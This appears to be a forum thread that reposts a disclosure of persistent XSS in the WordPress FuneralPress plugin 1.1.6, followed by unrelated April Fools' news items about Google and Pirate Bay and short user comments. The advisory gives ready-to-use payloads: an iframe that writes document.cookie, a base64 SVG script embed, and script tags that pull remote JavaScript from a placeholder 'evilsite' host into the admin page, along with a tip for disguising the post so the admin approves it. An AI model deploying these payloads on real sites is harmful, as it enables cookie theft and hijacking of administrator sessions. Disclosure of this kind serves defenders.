    Scripts injected via the "photo-message" and "youtube-message" elements will be executed by the admin user when they browse to the guestbook admin page at http://site/wp-admin/admin.php?page=wpfh-guestbook

    If a malicious post is approved by the admin, the script will be run by anyone viewing the guestbook.

    # details
    There appears to be some basic xss protection on form submissions using <textarea name="message"> and code injected via this element is not served up on the guestbook admin page. Despite this, scripts injected via an iframe or embedded svg will be executed by anyone viewing the guestbook at http://site/obituaries/?id=1&f=guestbook on the condition that the post is approved by the site administrator. The chances of an administrator approving a malicious message are increased if some normal-looking text is inserted above the malicious code, resulting in a legitimate looking "Message Preview" field on the admin page.

    ## message post example:
    1. Attacker browses to: http://site/obituaries/?id=1&f=guestbook&m=add and submits the form with the following entered into <textarea name="message" style="width:98%;height:170px" id="wpfh_message_textarea"></textarea> :

    Poor Peter was a fine old chap, such a pity he was eaten to death by a pack of wild children.
    <IFRAME SRC="javascript:document.write('xss cookie: ' + document.cookie);"></IFRAME>
    <EMBED SRC="data:image/svg+xml ;base64,PHN2ZyB4bWxuczpzdmc9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAwIiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZW NtYXNjcmlwdCI+YWxlcnQoInhzcyBhbGVydCIpPC9zY3JpcHQ+PC9zdmc+Cg==" type="image/ svg+xml" AllowScriptAccess="always"></EMBED>

    2. Site administrator browses to http://site/wp-admin/admin.php?page=wpfh-guestbook, sees an entry with a message preview that reads "Poor Peter was a fine old chap..." and approves it.
    3. Anyone browsing to http://site/obituaries/?id=1+&f=guestbook will execute the injected script

    The xss flaws in <textarea name="photo-message"> and <textarea name="youtube-message"> are more serious, as scripts injected here are served up to the admin user when they attempt to approve the guestbook comments at http://site/wp-admin/admin.php?page=wpfh-guestbook

    As with the regular guestbook messages, if the admin approves a malicious photo or youtube message the script will be executed by anyone browsing to the guestbook.

    ## photo/youtube post example:
    1. Attacker hosts malicious javascript on another site:
    http://evilsite/fp.js :
    document.getElementById("topmenu").innerHTML="<h1>XSS</h1>"; //rewrite admin page
    http://evilsite/doc.js :
    document.write("document.write XSS");alert("XSS");
    2. Attacker browses to: http://site/obituaries/?id=1&f=guestbook&m=add and selects either the "Photo" or "Youtube" guestbook message option
    3. If Photo was selected, the attacker enters a path to a local image in <input type="file" name="photo" id="wpfh_message_file">. Otherwise they enter a Youtube link into <input type="text" name="youtube" style="width:95%" id="wpfh_message_youtube" value="">
    4. Depending on which type of message was selected, the attacker submits the form with the following entered into <textarea style="width:100%;height:70px" name="photo-message"></textarea> or <textarea style="width:100%;height:70px" name="youtube-message"></textarea> :
    <SCRIPT SRC=http://evilsite/fp.js></SCRIPT>
    <SCRIPT SRC=http://evilsite/doc.js></SCRIPT>
    5. The site administrator browses to http://site/wp-admin/admin.php?page=wpfh-guestbook and the scripts that have been injected into <table class="wp-list-table widefat fixed posts" cellspacing="0"> are executed:
    <td style="background-color:#ffd1d1 !important" >
    <a href="http://www.youtube.com/watch?v=tsLkL8DTHeg" target="_blank">View Video</a><br><SCRIPT SRC=http://evilsite/fp.js ></SCRIPT> <SCRIPT SRC=http://evilsite/doc.js></SCRIPT>
    </td>

    Source: Wordpress FuneralPress Plugin 1.1.6 - Persistent XSS
  21. April Fools' pranks. Google announced it is shutting down YouTube and will launch 3 new apps.

    Google did not forget APRIL 1 either and prepared several truly amusing surprises for its users. The first is the launch of a new app called GOOGLE NOSE. The app, created specially as an APRIL 1 PRANK, will help users find out what flower is in front of them based on its smell, and also what kind of food is being cooked when they walk into an apartment. In presenting the app, Google specified that by using Nose you can identify by smell "a new car, the inside of an Egyptian tomb or a ghost". Google's second APRIL 1 PRANK is the launch of a new Gmail, called Blue: "It will be the same as the old Gmail, only blue". Those who use Google Maps did not escape the pranks this morning either. For APRIL 1, Google prepared the "Google Treasure Maps" service for all Google Maps users. But let us move on to more sensitive subjects, not just amusing ones. That is because Google announced, in a clip posted last night, that it will shut down YouTube and, as a final gesture toward its millions of users, will select the best clip ever posted on the video streaming network. The clip with the announcement made by YouTube officials was viewed overnight by almost 400,000 people.

    Source: April Fools' pranks. Google announced it is shutting down YouTube and will launch 3 new apps. VIDEO - www.yoda.ro
  22. Pirate Bay, announcement made a short while ago: The pirates say they are moving out of North Korea

    Today is April 1, and the announcement made on Facebook by Pirate Bay fits that line.

    The pirates at Pirate Bay announced on Monday at noon on their Facebook account that they plan to move to the US from North Korea. Stories about Pirate Bay and North Korea also appeared at the beginning of March and turned out to be false. Here is the announcement posted on the torrent site's Facebook page.

    You probably heard about our recent move to North Korea. Many of you rightfully bashed us for siding with a dictatorship. We want you to know that we have listened to your critique. So without further due, we hereby announce that we have moved our servers from the evil North Korea to the greatest fuckin nation in the entire world. The United States of America, fuck yeah! We have worked closely with the awesome american government to establish a strong military graded server park that will endure any nuclear attacks that Kim Jong Un and his evil allies might send at Us. Along with this move to the greatest fuckin country in the universe, we will soon remove all torrents from North Korea, China, Iran, France and Islamistan. American torrents will be seeded with extra power, to ensure that you'll get your american dose extra fast. America, fuck yeah!

    Source: Pirate Bay, announcement made a short while ago: The pirates say they are moving out of North Korea - www.yoda.ro
  23. Nice, but it's getting nasty
  24. When a site is in ps's hands, I don't know who could deface it. This reminded me, too, that it's April 1!
  25. It seems to me like nonsense and a waste of time... a laughable prank (that's because it was announced).